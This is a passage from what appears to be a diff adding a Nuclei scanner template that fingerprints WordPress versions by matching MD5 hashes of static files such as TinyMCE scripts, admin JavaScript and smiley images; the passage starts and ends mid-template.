"{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"64b892be1df127fa6a45d6b47c0a3555\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.19 + dsl: + - "(\"6a5d784c2ac2ce5f64e0968c35492f03\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"0001917ebec06ecb3fbf863f38f4af52\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f26aeec9641346d082e288224578f806\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"105456f4e72329e3be147bf4fabf12b7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4370bc17007bd940b24ba43a1e07a9d0\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8b7d4426c90a3e383fdc90fe93eb317f\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"24aff27983cef631454c00e6c77ac213\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"1f951b112676690e39c4ae9463769a8b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"c6f58718992eea8c2d40b6220ab9e21d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"a699cf8ec50c40ef2f404dfc6df34ed9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/link/plugin.js" + matchers: + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"39bd1f3127ddd31725a07ebc87c4b858\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"8abb2c35fcbf0e1a3819704181a46f44\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"fbf53969b19e593f224ffab41eeaf4fb\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"7ca5d1131a7b8743f4687078bf038a89\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.6 + dsl: + - "(\"f82a4e04c8926d51b90680aecc07b9c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/categories.min.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"048d156901f50fbe55169e2fa4b1c396\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/categories.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"6fc0b70ea1595374c54e9d51aad4aa7f\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"048d156901f50fbe55169e2fa4b1c396\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"80b80ef0cb2360338c6e4668829ad013\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"1227fa15e7578a3763e8a23eb2a376c2\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"21bb0d381c89ce4a10a10d02e32cf0f6\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"27370aa117d13ca66a89b852bf80ac29\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-fields.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"87be866a7cdc94d840e6ed570c01efdd\" == md5(body))" + - type: dsl + name: 3.2 - 3.4.2 + dsl: + - "(\"4aeed8cd81abc96d27e7a6925d758ee2\" == md5(body))" + - type: dsl + name: 2.8 - 3.1.4 + dsl: + - "(\"14698a9d69a9256b8b63e1552dc85f06\" == md5(body))" + - type: dsl + name: 2.5 - 2.7.1 + dsl: + - "(\"29b80d93f3d1b24bd5529c23acd1719a\" == md5(body))" + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"5b555632a4efda6f8419e1bff3e35cd9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-fields.min.js" + matchers: + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4aeed8cd81abc96d27e7a6925d758ee2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/Thumbs.db" + matchers: + - type: dsl + name: 1.0.1-miles - 1.0.2 + dsl: + - "(\"c7aba2c49bbb10b312042ffdf586c765\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/menu.txt" + matchers: + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"702312cb8ae561fa80b59be708ef6cd2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-2.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"de5cf34823da2cfed273b9c8cf52248a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/star.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"888920359f8931eb72582d0c352722ff\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-3.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"a5b70a894f90cf8574284b7296f7661c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-9.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"4eda31d251821e5d6e5ed9cad411434f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-0.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"745de19d2c08e95dfa07113d16d77ace\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-6.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"7320c171d53bc359b0cd7ae1b53774d8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-7.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"a8cbf1fe3a498f4a20abd6768a46de7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-8.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"c5cb7ee14792e1658bc0663014d37f65\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-4.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"aa064cadd0f43c0352607dad68bc5af2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-1.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"bdc9ea72a16082ff4d0ac730f090e0d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/tick.png" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"9a0f4a15dd2be4db7bbcea535764158c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/links/rating-5.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"42698681e4d8734c2932c2415b94b713\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/wp-favicon.png" + matchers: + - type: dsl + name: 1.2-delta - 1.2.2 + dsl: + - "(\"918e3fd1705aedabf581fe9ec02aaaf1\" == md5(body))" + - type: dsl + name: 1.0.1-miles - 1.2.1 + dsl: + - "(\"b8e308c594171cb691807867733648a6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/xml.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.2.2 + dsl: + - "(\"e67c90a18c89f8d05125c045b2978dcf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/wp-small.png" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"2e6a6066f3baa2d9f633350759ccf14c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/get-firefox.png" + matchers: + - type: dsl + name: 1.5.1 - 1.5.2 + dsl: + - "(\"93e1d3f3524f4fc80491af0b77b12383\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/header-shadow.png" + matchers: + - type: dsl + name: 1.2-delta - 1.5.2 + dsl: + - "(\"3311f3d78a8001132cd15149441f8711\" == md5(body))" + - type: dsl + name: 1.0-platinum - 1.0.2 + dsl: + - "(\"4a1ecae7bc70f3ee911fc29e98ca0dab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/fade-butt.png" + matchers: + - type: dsl + name: 1.2-delta - 1.5.2 + dsl: + - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/wpminilogo.png" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"2f58b9a016e6da1012819decfc6dd331\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_question.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_neutral.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_sad.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_biggrin.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_surprised.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_wink.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_cool.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_confused.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_redface.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_cry.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_smile.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_evil.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_mrgreen.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_idea.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_razz.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_lol.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_rolleyes.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_exclaim.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_mad.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_twisted.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_arrow.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-images/smilies/icon_eek.gif" + matchers: + - type: dsl + name: 1.0-platinum - 1.5.2 + dsl: + - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dbx-key.js" + matchers: + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a59a1ff8f5f9e0539aa2ed4fa55ef786\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/list-manipulation.js" + matchers: + - type: dsl + name: 2.0.4 - 2.0.11 + dsl: + - "(\"cfe80cd05aabaaad96cf79c6239a3e40\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.1 + dsl: + - "(\"3c6adf4762efcaae44a38e58546b0ede\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/license.html" + matchers: + - type: dsl + name: 2.0 - 2.2.3 + dsl: + - "(\"46c1f90a66583219a5f60451a3f3244e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/install.css" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"234fed47c9eef92ca35985d459a99dbf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/dbx-admin-key.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"9301b8c88339ada63969bf9c7592c805\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/edit-comments.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"8b98dc81013e5510adde5c9280c410b6\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"c760347780287cbf8cf9baeb4c414c69\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/categories.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"27370aa117d13ca66a89b852bf80ac29\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"feedd6ae867a53792e962dc8dbf4e24c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/upload.css" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"b3503aa6a8fd1fe0996951232aedfd58\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"4d0c00b676ecb011dfdc74f8ceccf94b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/cat.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"c3ed1d4a7f90e5fc6c067e3565909868\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/users.js" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"ef8872688bcab72a712e681b5bdd0c36\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/upload.js" + matchers: + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"12d5041ec2286e75628d255c6bdca9b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/upload-rtl.css" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"6ac6023d409ec51409d67d7ee6b5a1b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/xfn.js" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"c77c9e9a636feadfd1b2d7c07e2f2ba9\" == md5(body))" + - type: dsl + name: 2.0.1 - 2.0.11 + dsl: + - "(\"1725d155e16823dc41c38aa8ba286e4f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/custom-fields.js" + matchers: + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"5b555632a4efda6f8419e1bff3e35cd9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/WpComments.png" + matchers: + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"f12204bb737213d9c0b530b918da182d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/WpWatermark.png" + matchers: + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"c5a6a59365ad54aa20c71e79da9dfd7a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/wlw/WpIcon.png" + matchers: + - type: dsl + name: 2.3.1 - 2.3.3 + dsl: + - "(\"e44d22b74f7ee4435e22062d5adf4a6a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/list-manipulation.js" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"4e420736ce40b9b74fa4c33a542a1554\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dbx.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"33c7eab1039d3730275aa1006a4dbfaa\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"40a9779c3c1c85fa6c809f73e63aa2da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/fat.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c6f7565dd1534de02ff7abc431afb042\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a21e15fafb4f7e5a8d63da28629e7372\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/about.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"e2797544e2ff9d93619115c814cb499b\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"0d8231212de38ac33fc0acc47640532c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/charmap.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"f2be81dcf588ab0c63f38c8e784f5b92\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"a7adfd8471aa61e073761c6e493fc888\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/color_picker.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"daa32e73b70e34bf35af84c88dd66202\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"1060329ab7d7e40013624a3870a45bc5\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"1cdc347fadca8d396fc114e473c8c8ee\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"0ff9bfe2714875340d9e59fd53c6a379\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/source_editor.js" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"7c1b8f3d2d9f49bc3bfb82f39365825f\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"614a9bef1a1ea2320ded644ee554452a\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"aa0bf6f829e3f5aba187180e5b4a562d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/image.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"84624af8d91ef4844b2a0c63a189e126\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"274835b88f02a287ea8c3c8037536e53\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/link.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"43375669c230d406aaf97e02ebb11ce5\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"e2d602453cfdf9a25eb486a601119a20\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"dfe1b584400bd3a2d34c3d631fcbd7f0\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"8d6af59e826a2f12743af96a883b64da\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/anchor.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4fb4a4ac51be664a0dbb5ef2cdb15d7c\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"6e13f946344844a532a8b5b06af27bba\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/newdocument.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"24b01aa27845c551f24a186a92cbc94e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/charmap.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"948c608cfe393168642e3946097eba3d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/left.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7e1153a270935427f7b61c7b6c21ab8a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyright.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"94fafae0c4b30d01d034a54376acdac3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_col_before.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d5910a210405a8cc7a24086104b06fa1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_fr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"8fbda35d5ebfc1474f93f808953b1386\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_tw.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c87ed929e41850e9614753da98827272\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d4eac7372d4d546db5110407596720dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_tw.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"6384b264f47452af481f36e1aa689bd7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_es.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"61553fb992530dbbbad211eddcc66eb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bullist.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"f360470402affab13062de5ffbfb7f74\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/numlist.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d4c72d6e6d56fee2315ad59426a99a4e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cancel_button_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"23ba9eb7eb91efec2014bbf0ecb7422b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cleanup.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"96382d6d24bb8a1b228586b323e72fb4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_delete_col.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"05582820e152a8b53d3fb3e622a0c974\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_row_after.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"f244bea608118e1b6609d1ade714ecd5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/anchor_symbol.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"5cb42865ce70a58d420786854fed4ae1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/indent.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"89c00ba134c89eb949411194060c135c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/menu_check.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"fce7c811d7adec70ce79ee7c4185ec47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/help.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/statusbar_resize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"1b952cd23844b834e0a307db3c803626\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/buttons.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"bc347ed84b0c8acfebf391e3716d3908\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4ad67d7e69bdc6cf5f43126479e39469\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyleft.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"7e1153a270935427f7b61c7b6c21ab8a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/browse.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"bc730549b16f827d1c04db513e34d011\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_es.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"8b9992b808d64bde50606703bf29b9e5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/insert_button_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"93699e9345172ce5eaa5876d432aaa19\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/separator.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"9636c1e228dc5d7c58ec2722a6d9ec23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/opacity.png" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"7f1c7b1ff1f3e04828540f6ffdde46c2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/button_menu.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"ed293e6a817f44328f74c0853c628e69\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"3ca9c0469bf52d46fd0b939bac08eb8d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/backcolor.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - 